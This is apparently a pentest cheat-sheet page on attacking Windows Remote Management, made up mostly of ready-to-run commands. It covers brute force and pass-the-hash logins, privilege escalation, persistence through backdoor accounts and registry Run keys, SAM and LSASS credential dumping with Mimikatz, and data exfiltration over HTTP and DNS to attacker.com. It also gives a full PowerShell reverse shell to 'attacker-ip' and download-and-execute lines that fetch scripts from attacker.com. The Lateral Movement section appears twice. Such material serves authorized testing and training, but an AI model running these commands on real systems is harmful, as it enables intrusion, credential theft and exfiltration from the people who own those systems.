WinRM

Default Ports: 5985 (HTTP), 5986 (HTTPS)

Windows Remote Management (WinRM) is Microsoft's implementation of the WS-Management protocol, allowing remote management of Windows machines. It's built into Windows and commonly used for remote administration, PowerShell remoting, and system automation. WinRM is the native remote management protocol for Windows and is often preferred over RDP in enterprise environments.

Connect

Using evil-winrm

# Basic connection
evil-winrm -i target.com -u administrator -p 'password'

# With domain
evil-winrm -i target.com -u 'DOMAIN\username' -p 'password'

# Using hash (Pass-the-Hash)
evil-winrm -i target.com -u administrator -H 'NTHASH'

# Using SSL (port 5986)
evil-winrm -i target.com -u administrator -p 'password' -S

# With custom port
evil-winrm -i target.com -u administrator -p 'password' -P 5985

Using PowerShell (from Windows)

# Create credentials
$password = ConvertTo-SecureString "password" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("administrator", $password)

# Connect interactively
Enter-PSSession -ComputerName target.com -Credential $cred

# Run command remotely
Invoke-Command -ComputerName target.com -Credential $cred -ScriptBlock { whoami }

# Connect to multiple machines
$computers = "server1", "server2", "server3"
Invoke-Command -ComputerName $computers -Credential $cred -ScriptBlock { hostname }

Using winrs (Windows Remote Shell)

# Execute single command
winrs -r:http://target.com:5985 -u:administrator -p:password "whoami"

# Interactive shell
winrs -r:http://target.com:5985 -u:administrator -p:password cmd

# With domain
winrs -r:http://target.com:5985 -u:DOMAIN\username -p:password cmd

Using Ruby WinRM Library

require 'winrm'

conn = WinRM::Connection.new(
  endpoint: 'http://target.com:5985/wsman',
  user: 'administrator',
  password: 'password'
)

conn.shell(:powershell) do |shell|
  output = shell.run('Get-Process') do |stdout, stderr|
    STDOUT.print stdout
    STDERR.print stderr
  end
end

Recon

Service Detection with Nmap

Use Nmap to detect WinRM services and identify server capabilities.

nmap -p 5985,5986 target.com

Banner Grabbing

Connect to WinRM services to gather version and service information.

Using netcat

# Using netcat
nc -vn target.com 5985

Using curl

# Using curl
curl http://target.com:5985/wsman

# Check WinRM configuration
curl -H "Content-Type: application/soap+xml;charset=UTF-8" \
  http://target.com:5985/wsman \
  -d '<?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd"><s:Header/><s:Body><wsmid:Identify/></s:Body></s:Envelope>'

Using nmap

# Detect WinRM version
nmap -p 5985,5986 -sV target.com

# Enumerate HTTP methods and headers
nmap -p 5985 --script http-methods target.com
nmap -p 5985 --script http-headers target.com

# Check WinRM configuration
nmap -p 5985,5986 --script http-wsman-info target.com

Configuration Check

Check WinRM configuration and service status.

# Check if WinRM is running (from target)
Get-Service WinRM

# Check WinRM configuration
winrm get winrm/config

# Check listeners
winrm enumerate winrm/config/listener

# Test if WinRM is accessible from remote
Test-WSMan -ComputerName target.com

Enumeration

Use various tools for detailed WinRM enumeration and information gathering.

User Enumeration

Enumerate user accounts to identify potential targets for privilege escalation.

# List local users
Get-LocalUser

# List domain users (if domain-joined)
Get-ADUser -Filter *

# Get current user
whoami
$env:USERNAME

# Get user groups
whoami /groups
Get-LocalGroup
Get-ADGroupMember "Domain Admins"

System Information

Gather system information for reconnaissance and privilege escalation.

# System information
systeminfo
Get-ComputerInfo

# OS version
[System.Environment]::OSVersion
Get-WmiObject Win32_OperatingSystem

# Architecture
[System.Environment]::Is64BitOperatingSystem
$env:PROCESSOR_ARCHITECTURE

# Hostname
hostname
$env:COMPUTERNAME

# Domain information
Get-WmiObject Win32_ComputerSystem | Select Domain

Network Enumeration

Map internal infrastructure and identify pivot targets.

# Network interfaces
ipconfig /all
Get-NetIPAddress
Get-NetIPConfiguration

# Routing table
route print
Get-NetRoute

# ARP table
arp -a
Get-NetNeighbor

# Active connections
netstat -ano
Get-NetTCPConnection

# DNS cache
ipconfig /displaydns
Get-DnsClientCache

Process and Service Enumeration

Enumerate processes and services for privilege escalation vectors.

# List running processes
Get-Process
tasklist /v

# Enumerate Windows services
Get-Service
sc query

# List scheduled tasks
Get-ScheduledTask
schtasks /query /fo LIST /v

# List startup programs
Get-CimInstance Win32_StartupCommand
wmic startup get caption,command

Enumerate network shares and file systems.

# List shares
net share
Get-SmbShare
Get-WmiObject Win32_Share

# Access shares
net use \\target\share
Get-SmbMapping

# Find accessible shares on network
Get-SmbShare -CimSession (Get-ADComputer -Filter *).Name

Attack Vectors

Exploit various WinRM vulnerabilities and misconfigurations for unauthorized access.

Brute Force Attack

Brute force WinRM credentials using various tools and techniques.

Using CrackMapExec

crackmapexec winrm target.com -u users.txt -p passwords.txt

Using Metasploit

use auxiliary/scanner/winrm/winrm_login
set RHOSTS target.com
set USER_FILE users.txt
set PASS_FILE passwords.txt
run

Using Custom Script

for user in $(cat users.txt); do
  for pass in $(cat passwords.txt); do
    echo "Trying $user:$pass"
    evil-winrm -i target.com -u "$user" -p "$pass" -e /tmp/test
  done
done

Pass-the-Hash

Exploit NTLM hash authentication for WinRM access.

# Using evil-winrm with NTLM hash
evil-winrm -i target.com -u administrator -H '32ed87bdb5fdc5e9cba88547376818d4'

# Using crackmapexec
crackmapexec winrm target.com -u administrator -H '32ed87bdb5fdc5e9cba88547376818d4'

# Using Metasploit
use exploit/windows/winrm/winrm_script_exec
set RHOSTS target.com
set USERNAME administrator
set HASH 32ed87bdb5fdc5e9cba88547376818d4
run

Command Execution

Execute commands remotely through WinRM.

# Basic command execution
Invoke-Command -ComputerName target.com -ScriptBlock { whoami }

# Multiple commands
Invoke-Command -ComputerName target.com -ScriptBlock {
  whoami
  hostname
  ipconfig
}

# Execute local script on remote
Invoke-Command -ComputerName target.com -FilePath .\script.ps1

# Download and execute
Invoke-Command -ComputerName target.com -ScriptBlock {
  IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')
}

Privilege Escalation

Escalate privileges on compromised WinRM systems.

# Check privileges
whoami /priv

# Check for unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

# Check for always install elevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

# Check for stored credentials
cmdkey /list
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\

# PowerUp enumeration
IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/PowerUp.ps1')
Invoke-AllChecks

Lateral Movement

Expand access to other systems using WinRM.

# Execute on multiple machines
$computers = Get-ADComputer -Filter * | Select -ExpandProperty Name
Invoke-Command -ComputerName $computers -ScriptBlock { hostname }

# Pass credentials to other systems
$cred = Get-Credential
Invoke-Command -ComputerName server2 -Credential $cred -ScriptBlock {
  # Commands here
}

# Copy files and execute
Copy-Item -Path payload.exe -Destination \\target\C$\Windows\Temp\
Invoke-Command -ComputerName target -ScriptBlock {
  C:\Windows\Temp\payload.exe
}

# PSRemoting through multiple hops
# Enable CredSSP on source
Enable-WSManCredSSP -Role Client -DelegateComputer target.com
# Execute with CredSSP
$cred = Get-Credential
Invoke-Command -ComputerName target.com -Credential $cred -Authentication CredSSP -ScriptBlock {
  Invoke-Command -ComputerName target2.com -ScriptBlock { hostname }
}

Post-Exploitation

Extract sensitive data and establish persistent access after successful WinRM exploitation.

Persistence

Create persistent backdoor access to compromised WinRM systems.

# Create backdoor user
net user backdoor P@ssw0rd123! /add
net localgroup administrators backdoor /add

# Scheduled task persistence
schtasks /create /tn "WindowsUpdate" /tr "powershell -enc <base64_payload>" /sc onstart /ru SYSTEM

# Registry Run key
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"

# WMI event subscription
$filter = Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{
  Name = "Backdoor"
  EventNameSpace = "root\cimv2"
  QueryLanguage = "WQL"
  Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}

Credential Harvesting

Extract credentials and authentication data from compromised systems.

# Dump SAM hashes
reg save HKLM\SAM C:\Windows\Temp\sam
reg save HKLM\SYSTEM C:\Windows\Temp\system
reg save HKLM\SECURITY C:\Windows\Temp\security

# Download files to attacker
download C:\Windows\Temp\sam
download C:\Windows\Temp\system
download C:\Windows\Temp\security

# Dump LSASS (requires admin)
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Run Mimikatz
IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds

# Extract credentials from memory
sekurlsa::logonpasswords

File Operations

Perform file operations on compromised WinRM systems.

# Upload file (evil-winrm)
upload /local/path/file.exe C:\Windows\Temp\file.exe

# Download file (evil-winrm)
download C:\Windows\System32\config\SAM /tmp/sam

# Copy files
Copy-Item -Path \\source\share\file.txt -Destination C:\Temp\

# Search for interesting files
Get-ChildItem -Path C:\ -Include *.txt,*.pdf,*.doc,*.xls -Recurse -ErrorAction SilentlyContinue

# Find passwords in files
Select-String -Path C:\*.txt,C:\*.config -Pattern "password"

Data Exfiltration

Extract and exfiltrate sensitive data from compromised systems.

# Compress and exfiltrate
Compress-Archive -Path C:\Sensitive\ -DestinationPath C:\Temp\data.zip
# Then download via evil-winrm
download C:\Temp\data.zip

# Exfiltrate via HTTP
$data = Get-Content C:\Sensitive\data.txt
Invoke-WebRequest -Uri "http://attacker.com/collect" -Method POST -Body $data

# Base64 encode and exfiltrate
$bytes = [System.IO.File]::ReadAllBytes("C:\Sensitive\file.exe")
$base64 = [System.Convert]::ToBase64String($bytes)
Invoke-WebRequest -Uri "http://attacker.com/collect" -Method POST -Body $base64

# DNS exfiltration
$data = Get-Content C:\data.txt
$data | ForEach-Object {
  nslookup "$_. attacker.com"
}

Reverse Shell

Establish reverse shell connections for persistent access.

# PowerShell reverse shell
$client = New-Object System.Net.Sockets.TCPClient('attacker-ip',4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
  $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
  $sendback = (iex $data 2>&1 | Out-String )
  $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
  $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
  $stream.Write($sendbyte,0,$sendbyte.Length)
  $stream.Flush()
}

# One-liner reverse shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker-ip',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Domain Reconnaissance

Perform Active Directory reconnaissance using WinRM access.

# Domain information
Get-ADDomain
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# Domain controllers
Get-ADDomainController -Filter *
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers

# Domain users
Get-ADUser -Filter * -Properties *
net user /domain

# Domain computers
Get-ADComputer -Filter *
net view /domain

# Domain groups
Get-ADGroup -Filter *
net group /domain

# Group members
Get-ADGroupMember "Domain Admins"
net group "Domain Admins" /domain

# GPOs
Get-GPO -All

Lateral Movement

Expand access to other systems using WinRM.

# Execute on multiple machines
$computers = Get-ADComputer -Filter * | Select -ExpandProperty Name
Invoke-Command -ComputerName $computers -ScriptBlock { hostname }

# Pass credentials to other systems
$cred = Get-Credential
Invoke-Command -ComputerName server2 -Credential $cred -ScriptBlock {
  # Commands here
}

# Copy files and execute
Copy-Item -Path payload.exe -Destination \\target\C$\Windows\Temp\
Invoke-Command -ComputerName target -ScriptBlock {
  C:\Windows\Temp\payload.exe
}

Common evil-winrm Commands

Command

Description

Usage

upload

Upload file to target

upload /local/file.exe C:\Windows\Temp\file.exe

download

Download file from target

download C:\file.txt /tmp/file.txt

services

List services

services

menu

Show available commands

menu

Bypass-4MSI

Bypass AMSI

Bypass-4MSI

Invoke-Binary

Execute binary from memory

Invoke-Binary /path/to/binary.exe

PowerShell Remoting Cmdlets

Cmdlet

Description

Example

Enter-PSSession

Interactive remote session

Enter-PSSession -ComputerName target

Exit-PSSession

Exit remote session

Exit-PSSession

Invoke-Command

Run command remotely

Invoke-Command -ComputerName target -ScriptBlock {cmd}

New-PSSession

Create persistent session

$s = New-PSSession -ComputerName target

Remove-PSSession

Close session

Remove-PSSession -Session $s

Get-PSSession

List active sessions

Get-PSSession

Useful Tools

Tool

Description

Primary Use Case

evil-winrm

WinRM shell

Interactive remote shell

crackmapexec

Network attack tool

Authentication and exploitation

Metasploit

Exploitation framework

Various WinRM modules

PowerShell Empire

Post-exploitation

C2 and lateral movement

BloodHound

AD reconnaissance

Domain mapping

Rubeus

Kerberos toolkit

Ticket manipulation

Mimikatz

Credential extractor

Password and hash dumping

PowerView

AD enumeration

Domain reconnaissance

Security Misconfigurations to Test

❌ Weak or default credentials
❌ WinRM enabled on all machines
❌ Unrestricted WinRM access
❌ No certificate validation (HTTP instead of HTTPS)
❌ CredSSP enabled (credential delegation risks)
❌ Unencrypted traffic (port 5985)
❌ Excessive user permissions
❌ No network segmentation
❌ TrustedHosts set to *
❌ No logging or monitoring of WinRM sessions

PreviousADB Android Debug Bridge NextVNC

Last updated 2 months ago

Connect

Using evil-winrm

Using PowerShell (from Windows)

Using winrs (Windows Remote Shell)

Using Ruby WinRM Library

Recon

Service Detection with Nmap

Banner Grabbing

Configuration Check

Enumeration

User Enumeration

System Information

Network Enumeration

Process and Service Enumeration

Share Enumeration

Attack Vectors

Brute Force Attack

Pass-the-Hash

Command Execution

Privilege Escalation

Lateral Movement

Post-Exploitation

Persistence

Credential Harvesting

File Operations

Data Exfiltration

Reverse Shell

Domain Reconnaissance

Lateral Movement

Common evil-winrm Commands

PowerShell Remoting Cmdlets

Useful Tools

Security Misconfigurations to Test